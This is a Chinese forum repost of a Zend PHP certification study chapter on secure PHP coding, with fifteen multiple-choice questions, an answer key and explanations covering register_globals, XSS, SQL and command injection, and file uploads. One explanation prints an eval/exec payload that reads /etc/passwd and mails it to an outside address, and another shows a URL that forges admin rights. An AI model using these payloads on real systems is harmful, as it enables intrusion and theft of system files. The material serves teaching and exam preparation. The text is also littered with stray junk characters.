Board logo

标题: [Zend权威认证试题讲解]第十一章 - 编写安全的PHP程序 [打印本页]

作者: admin    时间: 2008-4-29 17:24     标题: [Zend权威认证试题讲解]第十一章 - 编写安全的PHP程序

PHP太强大、太容易了,因此开发者常常忘记Web安全相关的问题。
" o0 x% b1 j  h( x抛开重要性不看,安全问题往往是网站中最容易被人忽视的一个部分。不幸的是,有很多种方法可以从内部或外部危害系统的安全,你必须不断的找出并修补这些潜在的危险因素。( _6 y0 Q, R) W- E
在进行安全检测时,有很多需要强调的问题——不止是与安全直接相关的,还包括许多其他的内容。1 H1 y! W0 l, a7 i$ t# o7 N
要编写安全的程序,首先必须掌握一些基础技术,这样你才能应付本章的题目。8 N: e2 J4 @" r! z$ i3 h

; B' c$ K. l' N& _- Z
: A2 i+ e2 |9 z4 I4 U问题' }6 t8 d" Z/ B; h' r
/ w* W; z8 @" L5 ^* k: C
1.以下哪种方法能防止你的PHP程序遭受外部入侵?$ m* ~5 s: i/ C" u7 V, G
, O4 [0 k+ b- u0 G" B
A.使用复杂的加密算法
, X3 N& v* @0 B) ?B.保护数据库密码" `) A% L" r+ f9 |# c  d9 F* B3 s
C.如果有可能的话,使用SSL
7 \8 s2 Q) S! ^3 i  T# eD.验证输入; W4 W4 w7 s: z4 G5 i6 L
E.只使用来源可信的输入' g, q' U* l7 B
$ }3 R8 |, R& l3 X# F6 G. [7 V
& X; B+ |8 d4 ~! P2 @/ s4 p' N
2.假设$action和$data变量用来接受用户输入,并且register_globals是打开的。以下代码是否安全?

  1. <?php
  2. if(isUserAdmin()) { $isAdmin = true; }
  3. $data = validate_and_return_input($data);
  4. switch($action)
  5. {
  6.     case 'add':
  7.         addSomething($data);
  8.         break;
  9.     case 'delete':
  10.         if($isAdmin) {
  11.             deleteSomething($data);
  12.         }
  13.         break;
  14.     case 'edit':
  15.         if($isAdmin) {
  16.             editSomething($data);
  17.         }
  18.         break;
  19.     default:
  20.         print "Bad Action.";
  21. }
  22. ?>
复制代码
A.安全。在执行受保护的操作前先检查$isAdmin是否为true* L' b2 K; \$ }5 q
B.不安全。没有确认$action是不是合法输入9 R2 V- }" V" H" L: v
C.不安全。$isAdmin可以通过register_globals被篡改; G; W& Y1 p" [& ~) S
D.安全。因为它验证了用户数据$data6 Z7 w- ^: \& [9 ^
E.A和B9 n- n/ q- v+ H" v* H
( R. C/ r8 m4 F( M2 {* e! g" o
6 V2 K) U- V: Z4 R+ B* ^
3.要防止跨站攻击,以下哪些是需要做的?(三选)
( Y! O4 H2 `/ [  Y5 l, S* Y$ A  t! P; h" }; h
A.永远不要使用include和require引入靠用户输入决定路径的文件(比如:include”$username/script.txt”;)3 c. Q3 W5 ^+ P
B.除非网站需要,否则关闭allow_url_fopen
: Z+ d6 ~- H% `7 G2 i; Q+ ^C.避免使用如curl这类用来打开远程连接的扩展库
* ]' r: b5 c! @+ Q: PD.使用类似strip_tags()一类的函数过滤一个用户输入给另一个用户看的内容
: A& q- c4 B& _/ |- L) ~# j+ ?E.以上都对
6 Z1 ~8 a3 B( b. O
6 W9 o% @: ?4 y0 B3 g  c
- _- i- m) }$ g! Q! x8 J4.如果register_globals必须要被打开,如何才能防止恶意用户危害系统安全?(双选)
2 U$ t/ \+ P: n3 I4 E
% N2 R  K9 g* E; O! R6 iA.过滤所有来自非信任源的数据: a4 G; H$ ^7 v; f4 B8 D/ K7 r
B.过滤所有外部数据- r* [' R9 W& `! M
C.所有变量在使用前先初始化. q% D8 G4 \# f# Y# }( Q
D.使用难猜变量名来防止用户篡改数据% w/ D; q( j% X0 r$ l6 \/ t4 x$ Y+ S
E.以上都对
/ f4 e: B( X. W/ `
6 X9 m( h( _$ [# T
4 g7 W, ~# ^6 h6 Q, r+ x  ~" \, m5.SQL查询常常基于用户输入的数据来构建。以下哪种方法能避免安全隐患?
7 j% z- j: l, i6 _% t2 [/ _( b2 L7 Q" p9 E, b( l
A.在数据服务器和web服务器之间放置防火墙. v" A& m5 \2 \9 h! `; n2 p
B.转义用户数据,使其中无法包含DBMS能执行的SQL命令+ V, m( S$ P$ N# v0 ]6 {
C.使用存储例程
; X8 a6 G6 O3 cD.使用面向对象编程,把每个查询定义为单独的类: S+ I; F0 s. F9 B# h# [5 l$ M. \: q

9 F3 Y" _  _) A. i4 i" j1 _. g
$ J% h- _* E# ~% v; B: D- e) Y6.某些时候需要在PHP脚本中使用第三方功能,来实现一些PHP不能完成的任务(比如调用压缩软件压缩某种PHP不支持其格式的文件)。在PHP脚本中执行系统命令时,以下哪些选项能确保没有命令注入?(双选)5 |, s; r% u# k6 q7 `" k8 M* Z

. e, S- [( f& R7 V' QA.总是给要在exec()中执行的命令加`9 U2 P) y: e# s: T1 z) w3 p3 Y
B.总是使用shell_exec函数,它能够在执行前对命令进行安全检查
( w6 z, _1 e5 kC.使用escapeshellcmd函数转义命令中的特殊字符  Z: v& k7 s: P& B  _5 f
D.在执行命令前,先用ini_set()打开safe_mode,9 }* p0 }7 ~8 O" Q1 `
E.用escapeshellarg函数在执行前转义命令参数. q) O9 ~$ n. i6 @0 e
0 S! @) v+ ^! h' z$ l& V, x9 u

( v5 O( O0 i6 M  d7.处理HTTP文件上传时,PHP把文件储存在$_FILES中。在PHP脚本的执行周期中,这些文件将放在本地的临时文件夹里,而在脚本结束后,文件将被自动删除。在处理HTTP文件上传时,如果确保当前操作的文件是正确的文件?(双选)1 w; D' Z* S4 b

( K7 z' C0 V% L1 X. M8 SA.操作前,将文件名与浏览器报告的文件名对比2 x4 k' Z2 F0 j, k8 A
B.操作前,用file_exists函数确保文件存在
1 L* t/ K: F) ]& z* u1 ~$ I& TC.用is_uploaded_file函数确认你的文件的确是通过HTTP方式传输过来的
& X2 ^- w  p7 k% [" Q& P" g% o3 }) bD.用move_upload_file()将文件移动到安全位置
) r8 z, F6 T  |3 y0 k2 oE.只信任PHP存储临时文件的目录下的文件2 w+ g9 \5 W. o1 z
6 C  C% v8 E0 D2 y  j) z0 o+ C
& i) ?  i7 ]) L
8.在PHP的“安全模式”下,以下哪些设置有助于降低安全风险?(三选), {; t! P0 ]$ q! M; ?0 x

5 U! F1 n" E! o7 K$ dA.限制shell命令的执行
& v2 w! L' V3 BB.限制对系统环境变量的访问
& k0 i0 j$ V# C$ a9 OC.限制PHP的文件包含目录) V: }; f# X5 P6 b4 a/ q, @
D.限制允许对数据库进行的操作
' @  C5 O) a' k0 B; YE.以上全部* t0 Z; F$ k7 y* j5 A

7 q9 p8 S( ]. \( U0 U4 g- ?# R8 h* L
/ Q8 d& K, a$ c+ G9 Q2 M& b9.要限制脚本只能访问一个指定的文件夹中的文件,以下那种方法最简单?; P" x: @0 C% l, P

$ F- }: A' Z# }" S& B! r6 E/ gA.打开safe_mode
" e( {' S: B  J$ i3 [" e- pB.用open_basedir指定允许的文件夹# f6 p6 a" [: M8 U
C.用自定义函数指定PHP可以访问的目录9 |" [/ q6 U7 i3 i/ j7 V& ]2 ~
D.设置文件系统权限,让PHP只能访问允许的目录0 @+ G+ I) c* I8 g( I. l* w
E.以上都不对,无法限制PHP的访问目录! }, W6 `1 `% z

+ X8 F) J" @- P0 F( p; X- z6 o- I3 P1 s
10.上传文件时,能否确保客户端浏览器不会上传大于指定容量的文件?
6 D/ }& {% E6 }0 o5 G0 F0 a% E- S/ H! ~$ }  U
A.能6 K. S0 n% C( Z1 I# K+ A5 l+ N
B.不能( Q0 `( y: i& t  A" e

! P7 w1 v, j- ^* b6 Y& ^5 h- `4 q8 \# r- h
11.你的PHP以CGI的形式运行在Linux+Apache系统的cgi-bin文件夹中。如果有人打开以下URL将发生什么?/ ?! F; [# W! \) b! ~

' _7 K8 ^6 Y) H/cgi-bin/php?/etc/passwd8 j2 [: u% |0 t* K3 j

: f( d- Z1 l+ Z) jA./etc/passwd目录下的文件都会被显示出来,造成安全隐患
" C" ~+ i" ?! L. x; ^  iB.操作系统会检查Apache是否允许打开/etc/passwd目录
7 s, l" Q! U% a9 D+ G5 mC./etc/passwd字符串作为参数传给了脚本8 T# N$ }% Q5 V+ Q
D.什么都不会发生。CGI模式下的PHP将自动拒绝此次访问
) H, V- |& t5 Y0 EE.PHP尝试把/etc/passwd作为PHP脚本进行解释
! S& X/ x6 e$ ]2 x/ f$ u& ]
: V5 Y- \0 Y. z" }% _0 |$ l" Y* R( `/ x9 G! B
12.尽管并不彻底,但以下哪些方法能识别并防范代码中的安全隐患?(选择最合适的答案)0 {8 w1 a6 D. M) p7 J# p- ^
A.查阅PHP手册中提到的安全隐患
7 C! c% m6 o0 c4 K; A2 nB.任何脚本执行失败的情况都写入日志
0 K, v; N" s2 Q, f; g( x/ ZC.保持更新最新的PHP版本,尤其是解决了安全问题的那些
0 h/ d- d, @1 b/ p! k8 TD.使用第三方PHP包时,了解并修正其中的安全问题
1 B# q. z5 ~; W0 D* s. g) h' v( cE.以上都对
+ p* w1 d. X' G& t
9 R) h5 L$ [, T. i8 V0 p9 s4 i6 Y' `% H: ^- b
13.当网站发生错误时,该如何处理?; C7 o- }' u% S. w6 X* e; N
* B4 }- L% H4 q8 M% N
A.应该向用户显示错误信息以及导致该错误的相关技术信息,并且网站管理员要记录这个错误4 d4 w  q; d% j& `2 b
B.需要记录该错误,并向用户致歉! \2 n$ I' n2 s% Q: e
C.应该向用户显示错误信息以及导致该错误的相关技术信息,以便用户把错误信息汇报给网站管理员# \3 R% _. @* |/ S
D.把用户引导回主页,让用户不知道发生了错误0 g& a5 w2 J* P6 r3 H
E.以上都不对
5 v& x& j' }2 J  ?/ c$ g7 P. P4 l5 [1 q: l5 F$ z+ X: [$ S
5 Y/ t( N( A4 y! a, N" p
14.        在什么情况下,以下脚本才是安全的?

  1. <?php
  2. $newfunc = create_function('$a', 'return $a * {$_POST['number]};”);
  3. $newfunc(10);
  4. ?>
复制代码
A.任何时候都安全。最坏的情况只不过是匿名函数newfunc()返回了一个数字
1 m# A$ d% e. ]B.当register_globals打开时
: q5 v" O( d' CC.什么时候都不安全。匿名函数newfunc()允许用户更改数学式的运行,将造成安全隐患
( {& M1 c; m; I. [" _6 [# e/ t! XD.什么时候都不安全。匿名函数newfunc()允许用户在服务器上执行任意代码,将造成安全隐患4 ]4 T' y8 l6 N( j( i1 l1 k" w% K0 D
E.只在allow_url_fopen打开时安全
# n: ~7 l8 Y$ D. G, Z- q3 h* k! q7 b4 {- _
; ]$ c  Q# d- L2 m1 e( G
15.以下哪种PHP安装方式有很高的安全隐患,并且运行效率也最低?
; m* a+ I5 u* b; T- k
7 s' Z9 [' }5 R& k: a- mA.Apache共享模块* s9 o+ U5 h: ^
B.Apache的编译模块
; f4 l% L' e% s6 U/ iC.CGI' }  a+ Q2 k5 x/ L' s9 f$ u6 b4 f
D.IIS下的ISAPI模块- g" }1 {1 z& |# f) y
* A2 A6 B0 c( W/ E8 t% V

2 ^2 m; A8 W* O0 E6 A
6 c: ^9 V  a) N- K: x) c. R& e# L答案速查
1 d+ S; N: \8 J  `# f" z1:D+ i7 ?% `8 S; U
2:C
/ @1 z' z+ V; s' e! l  M6 d7 R/ k3 }3:ABC
6 @& T$ g* @+ e  j2 z. V4:BC% Q/ e$ @( H! I& _
5:B
# n- n4 P% i" i& |) z' `+ \6:CE* ~. q. z) G* a8 E2 r& d
7:CD! V+ `$ _8 G5 I/ d4 D3 T/ T
8:ABC& d( C- _9 }% R- s% J% E, I
9:B
; _+ M2 a* E) {$ _10:B
" R. z* r5 `$ i5 g, C11:D: b0 U4 \- E; B  j+ O. X
12:E
: s; Y4 q6 e6 u4 V13:B
7 s6 b; I/ ?$ y9 O0 B14:D
; O& q6 c7 Z' @' J, ]15:C7 m' r# z% h( E. _8 V/ ?; h

0 Y) o* \( ]+ W7 k
+ I7 w1 b2 P) P/ ~, h, l" ?& @( w& ?8 c" s: o' V0 B
答案详解1 X0 j- O0 R+ N/ |( S% |* |
: F/ x; z. R* h" P+ m& ?4 X" s
1.正确答案是D。虽然其他选项在一定程度上也是正确的,但破解安全问题的最简单的方法还是验证外部数据。无论是来自用户提交的表单还是本地服务器环境,任何第三方数据都应该进行验证,以确保其符合程序需要。( |! v' [' A2 X1 M: w+ Z

' }4 f( @. a7 u- l; U6 A2.答案是C。这段代码绝对不安全!事实上,当register_globals打开时,这个安全问题十分常见。问题出在$isAdmin变量上:尽管它是一个布尔值,只有当用户是管理员时才会被赋值,而其他情况下不会赋值。但由于register_globals是打开的,恶意用户只要通过URL传递一个GET变量就可以获得管理员权限:
' @. Z) B0 O1 ?http://www.example.com/action.ph ... a=foo&isAdmin=1
8 t: v: Z, x; A+ }0 j; `3 U  [
6 Y8 u9 @  h% M' r3.正确答案是A,B和C。A和B说的都是相似的PHP安全问题,恶意用户可以通过篡改URL来修改$username变量。如果用户这么做了,并且allow_url_fopen是打开的,PHP将下载某台非信任的远程服务器上的script.txt文件,并当作本地PHP脚本执行。另一个常见但不那么严重的隐患是,把一个用户的输入传递给另一个用户。比如在论坛或电子邮件中,不过滤HTML标签。这将允许恶意用户使用JavaScript脚本攻击查看这段内容的用户,造成跨站攻击或者浏览器bug——可怜的用户因为你的过错而受害。
: a' n6 C2 _$ h& w/ G
# ?. c0 l8 H; ~  r; [4.正确答案是B和C。过滤非信任来源的数据听起来是个好主意,但实际上任何外部数据都有可能造成安全问题,并危及你的脚本。当register_globals打开时,显然要保证所有变量在使用前都进行过初始化,以防止恶意用户进行注入。
0 ^1 U; z; o" m
9 H7 Y+ a, f& s5.处理数据库查询中的用户数据时,你应该转义SQL中所有应该转义的数据。这是一个普遍的数据库问题——所有基于SQL的数据库都容易收到SQL注入攻击,需要用PHP提供的转义函数来防范。' g5 t9 s8 Y5 l0 J2 G1 }

3 G" z; x6 [  R$ K6.答案是C和E。在PHP里执行有变量参与的系统命令时,没有任何一个函数是“绝对安全”的。你应该用escapeshellcmd和escapeshellarg函数转义传递给shell的命令和参量。3 W" ?! o# V5 M) f% i5 b
  O- H) m7 O4 d
7.正确答案是C和D。即使脚本执行完后不需要保存该文件,你也应该在访问此文件之前,先用is_uploaded_file函数确保文件名正确。同样,如果需要把文件从临时文件夹移出以长期保存该文件时,你应该使用move_upload_file函数,它会在移动前对该文件进行检查。
% n. e) D8 b4 G% N2 R, I% u9 |! Y4 K! m- [6 I- b
8.正确答案是A,B和C。安全模式提供了许多附加的安全验证,有助于降低安全隐患——尤其是在多个用户访问同一个PHP的共享主机上。尽管安全模式能限制一些东西,但在执行系统命令、访问环境变量和判断文件是否能被引入(比如对每个文件进行额外的UID/GID检查)时,它无法进行安全检查。
0 c' n4 J/ Q& ~  k4 W# R4 _
. T' j2 G" f9 J  ]4 C5 r. ]+ G3 y9.正确答案是B。open_basedir设置能让你指定允许PHP读取的目录。这项设置是独立于safe_mode之外的,并且可以指定多个目录。注意,选项D也是一种可行的限制访问的方式,但它不够简单——还很难维护。
0 \  T" }' Y5 ~4 B/ y
% A! E+ O  q' ]  ~8 j10.正确答案是B。尽管可以通过在HTML中添加一个MAX_FILE_SIZE隐藏域的方式来指定上传文件的容量限制,但难保客户端就一定会遵守此约定(译者注:事实上,没有任何一个浏览器遵守了此约定)。+ T: X6 I( r$ q( Z4 e$ S/ _2 D

  G# h6 b& K/ u' k% O9 Z2 g$ ^: Z11.以CGI模式运行时,PHP将自动采取一些措施来减少常见的安全隐患。措施之一就应用在把任意某个文件作为命令行参量传递给解释器执行的时候。如果不是这样,PHP将尝试读取/etc/passwd——一个“全球可读(world-readable)”的文件,同时解释器把它视作PHP脚本来执行,最终导致所有的用户帐号被输出到客户端上。不过,由于PHP内建的安全机制,实际上什么都不会发生。答案是D。/ g% [. S+ @8 t- [+ W
7 d. O7 ^/ T" k4 b; Z8 ^5 p4 D: Q
12.正确答案是E。所有选项都能被开发者用来降低网站的危险系数。要想有效得保证网站安全,你首先应该找出潜在的危险。意味着你必须关注安全公告,记录可疑操作(可能是恶意用户企图攻击你的系统)。+ v6 `3 M' x1 S6 i" e7 v( U

4 ~" N7 T: |% c+ ]13.正确答案是B。网站不应该向用户展示任何无意义的信息(比如一个失败的SQL查询)。尽管这些信息对大部分用户来说毫无意义,但对开发者(包括黑客)来说这些却是非常有价值的资源。他们可以由此找到一条有效的策略来攻击你的系统。比如说,一个恶意用户由此知道了你的SQL查询的结构,那他就非常容易通过表单进行注入,造成安全隐患。当错误发生时,应该只给用户发送一条致歉信息,而错误细节应该被记录在日志中,以便网站管理员查阅。. c) v1 M8 M; i. a, p. J- s

. Y* v9 |/ F8 R% G, m14.正确答案是D。尽管很隐蔽,但该脚本确实能让用户在服务器上执行任何代码。作为数学式的一部分,考虑一下当$_POST[‘number’]是如下字符串时的情况:, E5 h# x0 T- A  R+ S+ {* W
        (eval(“exec('cat /etc/passwd | mail baduser@89w.org');”)) ? 0 : 1: A' {7 h& V* M
        匿名函数将变成:) L* Z5 M& U( k$ D/ A; o
        return $a * (eval(“exec('cat /etc/passwd | mail baduser@89w.org);”)) ? 0 : 1;/ v2 v- j$ a" ]: K
        这将使得用户可以通过eval()语句执行任何代码,而且返回的仍然是一个“合法”值。create_function()或eval()能执行动态代码,所以必须仔细检查动态部分,避免注入。
4 v5 S- P% d1 L- I! r# a$ S
: l5 B. x5 y6 R) l2 h& g+ b5 A" N' R5 r15.任何安装不恰当的PHP版本都会有安全问题,但在选项中,CGI最严重。默认状态下它有许多安全隐患,并且执行效率低下,在上线前需要进行严格的检查。答案是C。




欢迎光临 捌玖网络工作室 (http://www.89w.org/) Powered by Discuz! 7.2